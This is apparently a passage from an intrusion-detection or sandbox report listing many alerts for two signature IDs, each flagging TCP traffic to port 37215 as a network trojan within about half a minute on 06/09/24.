          SID:2829579
          Source Port:49818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299329
          SID:2835222
          Source Port:51410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078932
          SID:2835222
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296539
          SID:2835222
          Source Port:44874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034085
          SID:2829579
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038928
          SID:2829579
          Source Port:55146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162971
          SID:2829579
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568060
          SID:2835222
          Source Port:43518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476912
          SID:2835222
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012946
          SID:2829579
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471859
          SID:2835222
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718037
          SID:2835222
          Source Port:42838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076277
          SID:2835222
          Source Port:39410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103964
          SID:2829579
          Source Port:39198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165575
          SID:2835222
          Source Port:51050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081031
          SID:2835222
          Source Port:38492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272853
          SID:2835222
          Source Port:38230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312765
          SID:2835222
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102456
          SID:2829579
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905388
          SID:2829579
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037645
          SID:2835222
          Source Port:44100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035892
          SID:2835222
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271261
          SID:2835222
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398700
          SID:2829579
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226846
          SID:2835222
          Source Port:37944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646434
          SID:2835222
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417643
          SID:2829579
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104807
          SID:2835222
          Source Port:45106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823390
          SID:2829579
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301245
          SID:2829579
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418292
          SID:2829579
          Source Port:46808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559067
          SID:2835222
          Source Port:36180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988275
          SID:2829579
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902429
          SID:2829579
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290573
          SID:2835222
          Source Port:39842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820349
          SID:2835222
          Source Port:45530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606089
          SID:2835222
          Source Port:51394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283813
          SID:2835222
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028793
          SID:2835222
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082168
          SID:2829579
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983793
          SID:2829579
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.638065
          SID:2835222
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821961
          SID:2829579
          Source Port:45782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248939
          SID:2829579
          Source Port:35982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684891
          SID:2829579
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036726
          SID:2829579
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719469
          SID:2835222
          Source Port:37452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596838
          SID:2829579
          Source Port:55956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299658
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909469
          SID:2829579
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271212
          SID:2829579
          Source Port:51952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566389
          SID:2829579
          Source Port:38916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289132
          SID:2835222
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914992
          SID:2835222
          Source Port:47042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946379
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991262
          SID:2829579
          Source Port:33832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929746
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475644
          SID:2835222
          Source Port:57750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923806
          SID:2829579
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822308
          SID:2829579
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029321
          SID:2835222
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990894
          SID:2829579
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035944
          SID:2835222
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558775
          SID:2829579
          Source Port:52018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103565
          SID:2829579
          Source Port:43436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028687
          SID:2829579
          Source Port:57834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396391
          SID:2835222
          Source Port:59910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165477
          SID:2835222
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914630
          SID:2829579
          Source Port:54782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713490
          SID:2829579
          Source Port:55930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165719
          SID:2829579
          Source Port:50422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286983
          SID:2835222
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034107
          SID:2835222
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490171
          SID:2829579
          Source Port:60662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946119
          SID:2835222
          Source Port:54090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028911
          SID:2835222
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823723
          SID:2829579
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163933
          SID:2835222
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419464
          SID:2835222
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075695
          SID:2829579
          Source Port:53482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161931
          SID:2835222
          Source Port:49750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568242
          SID:2829579
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399541
          SID:2835222
          Source Port:40942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103868
          SID:2835222
          Source Port:39270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822368
          SID:2829579
          Source Port:51156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916723
          SID:2829579
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030369
          SID:2835222
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037709
          SID:2829579
          Source Port:42556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250546
          SID:2829579
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863739
          SID:2829579
          Source Port:40488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223965
          SID:2835222
          Source Port:46246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891114
          SID:2835222
          Source Port:36850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724216
          SID:2835222
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033850
          SID:2835222
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718407
          SID:2835222
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562067
          SID:2835222
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008489
          SID:2835222
          Source Port:44706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301151
          SID:2835222
          Source Port:59148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721639
          SID:2829579
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929414
          SID:2829579
          Source Port:60854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717906
          SID:2835222
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206701
          SID:2835222
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166028
          SID:2829579
          Source Port:56568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539372
          SID:2829579
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398203
          SID:2829579
          Source Port:56304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230433
          SID:2829579
          Source Port:50622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468629
          SID:2829579
          Source Port:60316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417455
          SID:2835222
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398810
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923159
          SID:2829579
          Source Port:44336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955184
          SID:2835222
          Source Port:49084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990380
          SID:2829579
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908904
          SID:2829579
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224762
          SID:2835222
          Source Port:47672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559146
          SID:2835222
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084824
          SID:2829579
          Source Port:43670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688151
          SID:2835222
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286617
          SID:2835222
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074977
          SID:2829579
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989014
          SID:2835222
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288195
          SID:2829579
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820618
          SID:2829579
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160409
          SID:2835222
          Source Port:43344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910689
          SID:2829579
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721357
          SID:2835222
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472127
          SID:2829579
          Source Port:40522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299825
          SID:2829579
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397411
          SID:2829579
          Source Port:60664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274746
          SID:2829579
          Source Port:51452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133324
          SID:2829579
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987974
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251407
          SID:2829579
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397586
          SID:2835222
          Source Port:51986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924363
          SID:2835222
          Source Port:37812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645501
          SID:2829579
          Source Port:38692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606688
          SID:2829579
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288660
          SID:2835222
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207782
          SID:2829579
          Source Port:49470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398832
          SID:2829579
          Source Port:39476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081160
          SID:2829579
          Source Port:57276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284525
          SID:2835222
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822471
          SID:2829579
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945502
          SID:2835222
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161970
          SID:2829579
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945291
          SID:2829579
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988732
          SID:2829579
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719687
          SID:2829579
          Source Port:46918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097055
          SID:2835222
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163953
          SID:2829579
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563318
          SID:2829579
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469700
          SID:2835222
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223273
          SID:2829579
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946721
          SID:2829579
          Source Port:50920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719253
          SID:2829579
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931804
          SID:2835222
          Source Port:46444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926003
          SID:2835222
          Source Port:52844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556788
          SID:2829579
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.092429
          SID:2835222
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164014
          SID:2835222
          Source Port:57610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928048
          SID:2829579
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227860
          SID:2829579
          Source Port:49458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865145
          SID:2829579
          Source Port:41022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120930
          SID:2829579
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242408
          SID:2835222
          Source Port:50490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645013
          SID:2835222
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087058
          SID:2835222
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278925
          SID:2829579
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418332
          SID:2835222
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165209
          SID:2829579
          Source Port:47606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248163
          SID:2835222
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397768
          SID:2835222
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490093
          SID:2829579
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986728
          SID:2829579
          Source Port:52754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929813
          SID:2835222
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396323
          SID:2835222
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162644
          SID:2829579
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868997
          SID:2829579
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914961
          SID:2835222
          Source Port:43678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713828
          SID:2835222
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915649
          SID:2829579
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396592
          SID:2829579
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537940
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823375
          SID:2829579
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292302
          SID:2829579
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274649
          SID:2829579
          Source Port:35090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102603
          SID:2835222
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719695
          SID:2829579
          Source Port:34262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861309
          SID:2829579
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986144
          SID:2835222
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948228
          SID:2829579
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538710
          SID:2829579
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418441
          SID:2829579
          Source Port:60284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645633
          SID:2835222
          Source Port:53510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076993
          SID:2829579
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567415
          SID:2829579
          Source Port:48094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948876
          SID:2835222
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038392
          SID:2829579
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946538
          SID:2829579
          Source Port:57996
          Destination Port:37215
